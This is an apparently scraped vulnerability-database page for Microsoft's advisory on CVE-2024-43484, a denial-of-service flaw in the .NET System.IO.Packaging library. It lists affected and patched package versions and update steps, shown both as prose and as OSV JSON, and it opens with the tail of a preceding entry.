{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2344615"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-202008.html"
},
{
"type": "WEB",
"url": "https://gitlab.com/gnutls/gnutls/-/issues/1553"
},
{
"type": "WEB",
"url": "https://gitlab.com/gnutls/libtasn1/-/issues/52"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00027.html"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250523-0002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-F32C-W444-8PPV
Vulnerability from github – Published: 2024-10-08 20:24 – Updated: 2025-03-31 13:32Microsoft Security Advisory CVE-2024-43484 | .NET Denial of Service Vulnerability
Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in System.IO.Packaging. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
The System.IO.Packaging library may allow untrusted inputs to influence algorithmically complex operations, leading to denial of service.
Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/328
Mitigation factors
Microsoft has not identified any mitigating factors for this vulnerability.
Affected Packages
The vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below
.NET 9
| Package name | Affected version | Patched version |
|---|---|---|
| System.IO.Packaging | >= 9.0.0-preview.1.24080.9, <= 9.0.0-rc.1.24431.7 | 9.0.0-rc.2.24473.5 |
.NET 8
| Package name | Affected version | Patched version |
|---|---|---|
| System.IO.Packaging | >= 8.0.0-preview.1.23110.8, <= 8.0.0 | 8.0.1 |
.NET 6
| Package name | Affected version | Patched version |
|---|---|---|
| System.IO.Packaging | >= 6.0.0-preview.1.21102.12, <= 6.0.0 | 6.0.1 |
Advisory FAQ
How do I know if I am affected?
If you have a runtime or SDK with a version listed, or an affected package listed in affected software or affected packages, you're exposed to the vulnerability.
How do I fix the issue?
- To fix the issue please install the latest version of .NET 8.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
- If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the
dotnet --infocommand. You will see output like the following;
.NET Core SDK (reflecting any global.json):
Version: 8.0.200
Commit: 8473146e7d
Runtime Environment:
OS Name: Windows
OS Version: 10.0.18363
OS Platform: Windows
RID: win10-x64
Base Path: C:\Program Files\dotnet\sdk\6.0.300\
Host (useful for support):
Version: 8.0.3
Commit: 8473146e7d
.NET Core SDKs installed:
8.0.200 [C:\Program Files\dotnet\sdk]
.NET Core runtimes installed:
Microsoft.AspAspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspAspNetCore.App]
Microsoft.AspNetCore.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App]
Microsoft.WindowsDesktop.App 8.0.3 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App]
To install additional .NET Core runtimes or SDKs:
https://aka.ms/dotnet-download
- If you're using .NET 9.0, you should download and install .NET 9.0 RC 2 Runtime or .NET 9.0.100-rc.2.24474.11 SDK (for Visual Studio 2022 v17.12 latest Preview) from https://dotnet.microsoft.com/download/dotnet-core/9.0.
- If you're using .NET 8.0, you should download and install .NET 8.0.10 Runtime or .NET 8.0.110 SDK (for Visual Studio 2022 v17.8) from https://dotnet.microsoft.com/download/dotnet-core/8.0.
- If you're using .NET 6.0, you should download and install .NET 6.0.35 Runtime or .NET 6.0.135 SDK (for Visual Studio 2022 v17.6) from https://dotnet.microsoft.com/download/dotnet-core/6.0.
.NET 8.0 and .NET 6.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.
Once you have installed the updated runtime or SDK, restart your apps for the update to take effect.
Additionally, if you've deployed self-contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
Other Information
Reporting Security Issues
If you have found a potential security issue in .NET 8.0 or .NET 6.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at https://aka.ms/corebounty.
Support
You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.
Disclaimer
The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
External Links
Revisions
V1.0 (October 08, 2024): Advisory published.
Version 1.0
Last Updated 2024-10-08
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 9.0.0-rc.1.24431.7"
},
"package": {
"ecosystem": "NuGet",
"name": "System.IO.Packaging"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0-preview.1.24080.9"
},
{
"fixed": "9.0.0-rc.2.24473.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.0.0"
},
"package": {
"ecosystem": "NuGet",
"name": "System.IO.Packaging"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0-preview.1.23110.8"
},
{
"fixed": "8.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.0.0"
},
"package": {
"ecosystem": "NuGet",
"name": "System.IO.Packaging"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0-preview.1.21102.12"
},
{
"fixed": "6.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-43484"
],
"database_specific": {
"cwe_ids": [
"CWE-407"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-08T20:24:56Z",
"nvd_published_at": "2024-10-08T18:15:10Z",
"severity": "HIGH"
},
"details": "# Microsoft Security Advisory CVE-2024-43484 | .NET Denial of Service Vulnerability\n\n## \u003ca name=\"executive-summary\"\u003e\u003c/a\u003eExecutive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in System.IO.Packaging. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nThe System.IO.Packaging library may allow untrusted inputs to influence algorithmically complex operations, leading to denial of service.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/328\n\n## \u003ca name=\"mitigation-factors\"\u003e\u003c/a\u003eMitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n\n## \u003ca name=\"affected-packages\"\u003e\u003c/a\u003eAffected Packages\nThe vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below\n\n### \u003ca name=\".NET 9\"\u003e\u003c/a\u003e.NET 9\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.IO.Packaging](https://www.nuget.org/packages/System.IO.Packaging) | \u003e= 9.0.0-preview.1.24080.9, \u003c= 9.0.0-rc.1.24431.7 | 9.0.0-rc.2.24473.5\n\n### \u003ca name=\".NET 8\"\u003e\u003c/a\u003e.NET 8\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.IO.Packaging](https://www.nuget.org/packages/System.IO.Packaging) | \u003e= 8.0.0-preview.1.23110.8, \u003c= 8.0.0 | 8.0.1\n\n### \u003ca name=\".NET 6\"\u003e\u003c/a\u003e.NET 6\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.IO.Packaging](https://www.nuget.org/packages/System.IO.Packaging) | \u003e= 6.0.0-preview.1.21102.12, \u003c= 6.0.0 | 6.0.1\n\n## Advisory FAQ\n\n### \u003ca name=\"how-affected\"\u003e\u003c/a\u003eHow do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-packages) or [affected packages](#affected-software), you\u0027re exposed to the vulnerability.\n\n### \u003ca name=\"how-fix\"\u003e\u003c/a\u003eHow do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 8.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n\n Version: 8.0.200\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 8.0.3\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 8.0.200 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspAspNetCore.App 8.0.3 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspAspNetCore.App]\n Microsoft.AspNetCore.App 8.0.3 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.WindowsDesktop.App 8.0.3 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you\u0027re using .NET 9.0, you should download and install .NET 9.0 RC 2 Runtime or .NET 9.0.100-rc.2.24474.11 SDK (for Visual Studio 2022 v17.12 latest Preview) from https://dotnet.microsoft.com/download/dotnet-core/9.0.\n* If you\u0027re using .NET 8.0, you should download and install .NET 8.0.10 Runtime or .NET 8.0.110 SDK (for Visual Studio 2022 v17.8) from https://dotnet.microsoft.com/download/dotnet-core/8.0.\n* If you\u0027re using .NET 6.0, you should download and install .NET 6.0.35 Runtime or .NET 6.0.135 SDK (for Visual Studio 2022 v17.6) from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 8.0 and .NET 6.0 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update \u0026 Security and then click Check for Updates.\n\nOnce you have installed the updated runtime or SDK, restart your apps for the update to take effect.\n\nAdditionally, if you\u0027ve deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in .NET 8.0 or .NET 6.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core \u0026 .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at \u003chttps://aka.ms/corebounty\u003e.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2024-43484]( https://www.cve.org/CVERecord?id=CVE-2024-43484)\n\n### Revisions\n\nV1.0 (October 08, 2024): Advisory published.\n\n_Version 1.0_\n\n_Last Updated 2024-10-08_",
"id": "GHSA-f32c-w444-8ppv",
"modified": "2025-03-31T13:32:05Z",
"published": "2024-10-08T20:24:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dotnet/runtime/security/advisories/GHSA-f32c-w444-8ppv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43484"
},
{
"type": "WEB",
"url": "https://github.com/dotnet/announcements/issues/328"
},
{
"type": "WEB",
"url": "https://github.com/dotnet/runtime/issues/108676"
},
{
"type": "PACKAGE",
"url": "https://github.com/dotnet/runtime"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43484"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250328-0007"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Microsoft Security Advisory CVE-2024-43484 | .NET Denial of Service Vulnerability"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.